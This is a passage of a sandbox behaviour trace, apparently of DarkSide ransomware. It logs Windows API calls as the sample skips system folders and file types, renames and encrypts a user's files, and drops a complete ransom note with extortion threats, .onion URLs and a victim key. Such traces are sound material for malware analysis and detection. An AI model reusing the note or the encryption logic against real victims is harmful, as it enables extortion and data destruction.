dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x654 [0147.471] SetFilePointerEx (in: hFile=0x654, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.471] ReadFile (in: hFile=0x654, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0147.473] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x70c49e48 [0147.473] RtlComputeCrc32 (PartialCrc=0x9e48, Buffer=0x3feb74, Length=0x80) returned 0x5f69f719 [0147.473] RtlComputeCrc32 (PartialCrc=0xf719, Buffer=0x3feb74, Length=0x80) returned 0x892a169d [0147.473] RtlComputeCrc32 (PartialCrc=0x169d, Buffer=0x3feb74, Length=0x80) returned 0xe7becd25 [0147.473] RtlComputeCrc32 (PartialCrc=0xcd25, Buffer=0x3feb74, Length=0x80) returned 0x589c8652 [0147.473] CloseHandle (hObject=0x654) returned 1 [0147.473] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0147.473] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" [0147.473] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned 0x40 [0147.473] wcscpy (in: _Dest=0x44e0100, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0147.473] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.c06622a1"), dwFlags=0x8) returned 1 [0147.476] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x654 [0147.476] CreateIoCompletionPort (FileHandle=0x654, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0147.476] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4790020 [0147.482] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x72247418 [0147.482] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x505bb53 [0147.482] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x64c64ce5 [0147.482] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x741ae6df [0147.482] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3a66c2d3 [0147.482] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x395013ec [0147.482] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x45b02dd0 [0147.482] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5b411914 [0147.485] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4790094, Length=0x80) returned 0x1caafa8 [0147.485] RtlComputeCrc32 (PartialCrc=0xafa8, Buffer=0x4790094, Length=0x80) returned 0xcc64f925 [0147.485] RtlComputeCrc32 (PartialCrc=0xf925, Buffer=0x4790094, Length=0x80) returned 0x16865876 [0147.485] RtlComputeCrc32 (PartialCrc=0x5876, Buffer=0x4790094, Length=0x80) returned 0x5e10711a [0147.485] RtlComputeCrc32 (PartialCrc=0x711a, Buffer=0x4790094, Length=0x80) returned 0x50fcaf3c [0147.485] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4790020) returned 1 [0147.485] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0147.485] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0147.485] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0147.485] FindClose (in: hFindFile=0x2db8740 | out: hFindFile=0x2db8740) returned 1 [0147.485] _wcsicmp (_Str1="backup", _Str2="Contacts") returned -1 [0147.485] wcslen (_String="backup") returned 0x6 [0147.486] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44a0060) returned 1 [0147.486] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44b0068) returned 1 [0147.486] FindNextFileW (in: hFindFile=0x2db8700, lpFindFileData=0x3fef6c | out: lpFindFileData=0x3fef6c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0147.486] FindNextFileW (in: hFindFile=0x2db8700, lpFindFileData=0x3fef6c | out: lpFindFileData=0x3fef6c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa73b02e0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xa73b02e0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0147.486] _wcsicmp (_Str1="$recycle.bin", _Str2="Desktop") returned -64 [0147.486] wcslen (_String="$recycle.bin") returned 0xc [0147.486] _wcsicmp (_Str1="config.msi", _Str2="Desktop") returned -1 [0147.486] wcslen (_String="config.msi") returned 0xa [0147.486] _wcsicmp (_Str1="$windows.~bt", _Str2="Desktop") returned -64 [0147.486] wcslen (_String="$windows.~bt") returned 0xc [0147.486] _wcsicmp (_Str1="$windows.~ws", _Str2="Desktop") returned -64 [0147.486] wcslen (_String="$windows.~ws") returned 0xc [0147.486] _wcsicmp (_Str1="windows", _Str2="Desktop") returned 19 [0147.486] wcslen (_String="windows") returned 0x7 [0147.486] _wcsicmp (_Str1="appdata", _Str2="Desktop") returned -3 [0147.486] wcslen (_String="appdata") returned 0x7 [0147.486] _wcsicmp (_Str1="application data", _Str2="Desktop") returned -3 [0147.486] wcslen (_String="application data") returned 0x10 [0147.486] _wcsicmp (_Str1="boot", _Str2="Desktop") returned -2 [0147.486] wcslen (_String="boot") returned 0x4 [0147.486] _wcsicmp (_Str1="google", _Str2="Desktop") returned 3 [0147.486] wcslen (_String="google") returned 0x6 [0147.486] _wcsicmp (_Str1="mozilla", _Str2="Desktop") returned 9 [0147.486] wcslen (_String="mozilla") returned 0x7 [0147.486] _wcsicmp (_Str1="program files", _Str2="Desktop") returned 12 [0147.486] wcslen (_String="program files") returned 0xd [0147.486] _wcsicmp (_Str1="program files (x86)", _Str2="Desktop") returned 12 [0147.486] wcslen (_String="program files (x86)") returned 0x13 [0147.486] _wcsicmp (_Str1="programdata", _Str2="Desktop") returned 12 [0147.486] wcslen (_String="programdata") returned 0xb [0147.486] _wcsicmp (_Str1="system volume information", _Str2="Desktop") returned 15 [0147.486] wcslen (_String="system volume information") returned 0x19 [0147.486] _wcsicmp (_Str1="tor browser", _Str2="Desktop") returned 16 [0147.486] wcslen (_String="tor browser") returned 0xb [0147.486] _wcsicmp (_Str1="windows.old", _Str2="Desktop") returned 19 [0147.486] wcslen (_String="windows.old") returned 0xb [0147.487] _wcsicmp (_Str1="intel", _Str2="Desktop") returned 5 [0147.487] wcslen (_String="intel") returned 0x5 [0147.487] _wcsicmp (_Str1="msocache", _Str2="Desktop") returned 9 [0147.487] wcslen (_String="msocache") returned 0x8 [0147.487] _wcsicmp (_Str1="perflogs", _Str2="Desktop") returned 12 [0147.487] wcslen (_String="perflogs") returned 0x8 [0147.487] _wcsicmp (_Str1="x64dbg", _Str2="Desktop") returned 20 [0147.487] wcslen (_String="x64dbg") returned 0x6 [0147.487] _wcsicmp (_Str1="public", _Str2="Desktop") returned 12 [0147.487] wcslen (_String="public") returned 0x6 [0147.487] _wcsicmp (_Str1="all users", _Str2="Desktop") returned -3 [0147.487] wcslen (_String="all users") returned 0x9 [0147.487] _wcsicmp (_Str1="default", _Str2="Desktop") returned -13 [0147.487] wcslen (_String="default") returned 0x7 [0147.487] wcscpy (in: _Dest=0x4480050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" [0147.487] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned 0x23 [0147.487] wcscpy (in: _Dest=0x4480094, _Source="Desktop" | out: _Dest="Desktop") returned="Desktop" [0147.487] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44a0060 [0147.487] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44b0068 [0147.487] wcscpy (in: _Dest=0x44a0060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0147.487] GetNamedSecurityInfoW () returned 0x0 [0147.487] SetEntriesInAclW () returned 0x0 [0147.487] SetNamedSecurityInfoW () returned 0x0 [0147.527] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d56f78) returned 1 [0147.527] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3feabc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0147.527] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0147.527] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0147.527] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0147.528] WriteFile (in: hFile=0x1c, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fea8c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fea8c*=0xa8f, lpOverlapped=0x0) returned 1 [0147.529] CloseHandle (hObject=0x1c) returned 1 [0147.529] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0147.529] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0147.529] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="" [0147.530] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 0x2a [0147.530] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", fInfoLevelId=0x0, lpFindFileData=0x3fecec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fecec) returned 0x2db8740 [0147.530] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd68b50e0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd68b50e0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.530] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6403ae0, ftCreationTime.dwHighDateTime=0x1d5e373, ftLastAccessTime.dwLowDateTime=0x4e3cae50, ftLastAccessTime.dwHighDateTime=0x1d5e57d, ftLastWriteTime.dwLowDateTime=0x4e3cae50, ftLastWriteTime.dwHighDateTime=0x1d5e57d, nFileSizeHigh=0x0, nFileSizeLow=0xed57, dwReserved0=0x0, dwReserved1=0x0, cFileName="6_2e p3MGy.swf", cAlternateFileName="6_2EP3~1.SWF")) returned 1 [0147.530] _wcsicmp (_Str1="6_2e p3MGy.swf", _Str2="README.c06622a1.TXT") returned -60 [0147.530] wcsstr (_Str="6_2e p3MGy.swf", _SubStr="README") returned 0x0 [0147.530] _wcsicmp (_Str1="autorun.inf", _Str2="6_2e p3MGy.swf") returned 43 [0147.530] wcslen (_String="autorun.inf") returned 0xb [0147.530] _wcsicmp (_Str1="boot.ini", _Str2="6_2e p3MGy.swf") returned 44 [0147.530] wcslen (_String="boot.ini") returned 0x8 [0147.530] _wcsicmp (_Str1="bootfont.bin", _Str2="6_2e p3MGy.swf") returned 44 [0147.530] wcslen (_String="bootfont.bin") returned 0xc [0147.530] _wcsicmp (_Str1="bootsect.bak", _Str2="6_2e p3MGy.swf") returned 44 [0147.530] wcslen (_String="bootsect.bak") returned 0xc [0147.530] _wcsicmp (_Str1="desktop.ini", _Str2="6_2e p3MGy.swf") returned 46 [0147.530] wcslen (_String="desktop.ini") returned 0xb [0147.530] _wcsicmp (_Str1="iconcache.db", _Str2="6_2e p3MGy.swf") returned 51 [0147.530] wcslen (_String="iconcache.db") returned 0xc [0147.530] _wcsicmp (_Str1="ntldr", _Str2="6_2e p3MGy.swf") returned 56 [0147.530] wcslen (_String="ntldr") returned 0x5 [0147.530] _wcsicmp (_Str1="ntuser.dat", _Str2="6_2e p3MGy.swf") returned 56 [0147.530] wcslen (_String="ntuser.dat") returned 0xa [0147.530] _wcsicmp (_Str1="ntuser.dat.log", _Str2="6_2e p3MGy.swf") returned 56 [0147.530] wcslen (_String="ntuser.dat.log") returned 0xe [0147.530] _wcsicmp (_Str1="ntuser.ini", _Str2="6_2e p3MGy.swf") returned 56 [0147.530] wcslen (_String="ntuser.ini") returned 0xa [0147.530] _wcsicmp (_Str1="thumbs.db", _Str2="6_2e p3MGy.swf") returned 62 [0147.530] wcslen (_String="thumbs.db") returned 0x9 [0147.531] _wcsicmp (_Str1="386", _Str2="swf") returned -64 [0147.531] wcslen (_String="386") returned 0x3 [0147.531] _wcsicmp (_Str1="adv", _Str2="swf") returned -18 [0147.531] wcslen (_String="adv") returned 0x3 [0147.531] _wcsicmp (_Str1="ani", _Str2="swf") returned -18 [0147.531] wcslen (_String="ani") returned 0x3 [0147.531] _wcsicmp (_Str1="bat", _Str2="swf") returned -17 [0147.531] wcslen (_String="bat") returned 0x3 [0147.531] _wcsicmp (_Str1="bin", _Str2="swf") returned -17 [0147.531] wcslen (_String="bin") returned 0x3 [0147.531] _wcsicmp (_Str1="cab", _Str2="swf") returned -16 [0147.531] wcslen (_String="cab") returned 0x3 [0147.531] _wcsicmp (_Str1="cmd", _Str2="swf") returned -16 [0147.531] wcslen (_String="cmd") returned 0x3 [0147.531] _wcsicmp (_Str1="com", _Str2="swf") returned -16 [0147.531] wcslen (_String="com") returned 0x3 [0147.531] _wcsicmp (_Str1="cpl", _Str2="swf") returned -16 [0147.531] wcslen (_String="cpl") returned 0x3 [0147.531] _wcsicmp (_Str1="cur", _Str2="swf") returned -16 [0147.531] wcslen (_String="cur") returned 0x3 [0147.531] _wcsicmp (_Str1="deskthemepack", _Str2="swf") returned -15 [0147.531] wcslen (_String="deskthemepack") returned 0xd [0147.531] _wcsicmp (_Str1="diagcab", _Str2="swf") returned -15 [0147.531] wcslen (_String="diagcab") returned 0x7 [0147.531] _wcsicmp (_Str1="diagcfg", _Str2="swf") returned -15 [0147.531] wcslen (_String="diagcfg") returned 0x7 [0147.531] _wcsicmp (_Str1="diagpkg", _Str2="swf") returned -15 [0147.531] wcslen (_String="diagpkg") returned 0x7 [0147.531] _wcsicmp (_Str1="dll", _Str2="swf") returned -15 [0147.531] wcslen (_String="dll") returned 0x3 [0147.531] _wcsicmp (_Str1="drv", _Str2="swf") returned -15 [0147.531] wcslen (_String="drv") returned 0x3 [0147.531] _wcsicmp (_Str1="exe", _Str2="swf") returned -14 [0147.532] wcslen (_String="exe") returned 0x3 [0147.532] _wcsicmp (_Str1="hlp", _Str2="swf") returned -11 [0147.532] wcslen (_String="hlp") returned 0x3 [0147.532] _wcsicmp (_Str1="icl", _Str2="swf") returned -10 [0147.532] wcslen (_String="icl") returned 0x3 [0147.532] _wcsicmp (_Str1="icns", _Str2="swf") returned -10 [0147.532] wcslen (_String="icns") returned 0x4 [0147.532] _wcsicmp (_Str1="ico", _Str2="swf") returned -10 [0147.532] wcslen (_String="ico") returned 0x3 [0147.532] _wcsicmp (_Str1="ics", _Str2="swf") returned -10 [0147.532] wcslen (_String="ics") returned 0x3 [0147.532] _wcsicmp (_Str1="idx", _Str2="swf") returned -10 [0147.532] wcslen (_String="idx") returned 0x3 [0147.532] _wcsicmp (_Str1="ldf", _Str2="swf") returned -7 [0147.532] wcslen (_String="ldf") returned 0x3 [0147.532] _wcsicmp (_Str1="lnk", _Str2="swf") returned -7 [0147.532] wcslen (_String="lnk") returned 0x3 [0147.532] _wcsicmp (_Str1="mod", _Str2="swf") returned -6 [0147.532] wcslen (_String="mod") returned 0x3 [0147.532] _wcsicmp (_Str1="mpa", _Str2="swf") returned -6 [0147.532] wcslen (_String="mpa") returned 0x3 [0147.532] _wcsicmp (_Str1="msc", _Str2="swf") returned -6 [0147.532] wcslen (_String="msc") returned 0x3 [0147.532] _wcsicmp (_Str1="msp", _Str2="swf") returned -6 [0147.532] wcslen (_String="msp") returned 0x3 [0147.532] _wcsicmp (_Str1="msstyles", _Str2="swf") returned -6 [0147.532] wcslen (_String="msstyles") returned 0x8 [0147.532] _wcsicmp (_Str1="msu", _Str2="swf") returned -6 [0147.532] wcslen (_String="msu") returned 0x3 [0147.532] _wcsicmp (_Str1="nls", _Str2="swf") returned -5 [0147.532] wcslen (_String="nls") returned 0x3 [0147.532] _wcsicmp (_Str1="nomedia", _Str2="swf") returned -5 [0147.532] wcslen (_String="nomedia") returned 0x7 [0147.532] _wcsicmp (_Str1="ocx", _Str2="swf") returned -4 [0147.533] wcslen (_String="ocx") returned 0x3 [0147.533] _wcsicmp (_Str1="prf", _Str2="swf") returned -3 [0147.533] wcslen (_String="prf") returned 0x3 [0147.533] _wcsicmp (_Str1="ps1", _Str2="swf") returned -3 [0147.533] wcslen (_String="ps1") returned 0x3 [0147.533] _wcsicmp (_Str1="rom", _Str2="swf") returned -1 [0147.533] wcslen (_String="rom") returned 0x3 [0147.533] _wcsicmp (_Str1="rtp", _Str2="swf") returned -1 [0147.533] wcslen (_String="rtp") returned 0x3 [0147.533] _wcsicmp (_Str1="scr", _Str2="swf") returned -20 [0147.533] wcslen (_String="scr") returned 0x3 [0147.533] _wcsicmp (_Str1="shs", _Str2="swf") returned -15 [0147.533] wcslen (_String="shs") returned 0x3 [0147.533] _wcsicmp (_Str1="spl", _Str2="swf") returned -7 [0147.533] wcslen (_String="spl") returned 0x3 [0147.533] _wcsicmp (_Str1="sys", _Str2="swf") returned 2 [0147.533] wcslen (_String="sys") returned 0x3 [0147.533] _wcsicmp (_Str1="theme", _Str2="swf") returned 1 [0147.533] wcslen (_String="theme") returned 0x5 [0147.533] _wcsicmp (_Str1="themepack", _Str2="swf") returned 1 [0147.533] wcslen (_String="themepack") returned 0x9 [0147.533] _wcsicmp (_Str1="wpx", _Str2="swf") returned 4 [0147.533] wcslen (_String="wpx") returned 0x3 [0147.533] _wcsicmp (_Str1="lock", _Str2="swf") returned -7 [0147.533] wcslen (_String="lock") returned 0x4 [0147.533] _wcsicmp (_Str1="key", _Str2="swf") returned -8 [0147.533] wcslen (_String="key") returned 0x3 [0147.533] _wcsicmp (_Str1="hta", _Str2="swf") returned -11 [0147.533] wcslen (_String="hta") returned 0x3 [0147.533] _wcsicmp (_Str1="msi", _Str2="swf") returned -6 [0147.533] wcslen (_String="msi") returned 0x3 [0147.533] _wcsicmp (_Str1="pdb", _Str2="swf") returned -3 [0147.533] wcslen (_String="pdb") returned 0x3 [0147.534] _wcsicmp (_Str1="sql", _Str2="swf") returned -6 [0147.534] wcslen (_String="sql") returned 0x3 [0147.534] _wcsicmp (_Str1="sqlite", _Str2="swf") returned -6 [0147.534] wcslen (_String="sqlite") returned 0x6 [0147.534] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0147.534] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0147.534] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0147.534] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0147.534] wcscpy (in: _Dest=0x44d00cc, _Source="6_2e p3MGy.swf" | out: _Dest="6_2e p3MGy.swf") returned="6_2e p3MGy.swf" [0147.534] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6_2e p3MGy.swf", dwFileAttributes=0x80) returned 1 [0147.534] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6_2e p3MGy.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6_2e p3mgy.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x634 [0147.534] SetFilePointerEx (in: hFile=0x634, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.534] ReadFile (in: hFile=0x634, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0147.535] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0xa46ca90b [0147.535] RtlComputeCrc32 (PartialCrc=0xa90b, Buffer=0x3feb74, Length=0x80) returned 0x58e77d66 [0147.535] RtlComputeCrc32 (PartialCrc=0x7d66, Buffer=0x3feb74, Length=0x80) returned 0xa684a555 [0147.535] RtlComputeCrc32 (PartialCrc=0xa555, Buffer=0x3feb74, Length=0x80) returned 0x57655a44 [0147.535] RtlComputeCrc32 (PartialCrc=0x5a44, Buffer=0x3feb74, Length=0x80) returned 0x36955ab0 [0147.535] CloseHandle (hObject=0x634) returned 1 [0147.535] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0147.535] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6_2e p3MGy.swf" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6_2e p3MGy.swf") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6_2e p3MGy.swf" [0147.535] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6_2e p3MGy.swf") returned 0x38 [0147.535] wcscpy (in: _Dest=0x44e00f0, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0147.535] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6_2e p3MGy.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6_2e p3mgy.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6_2e p3MGy.swf.c06622a1" (normalized: 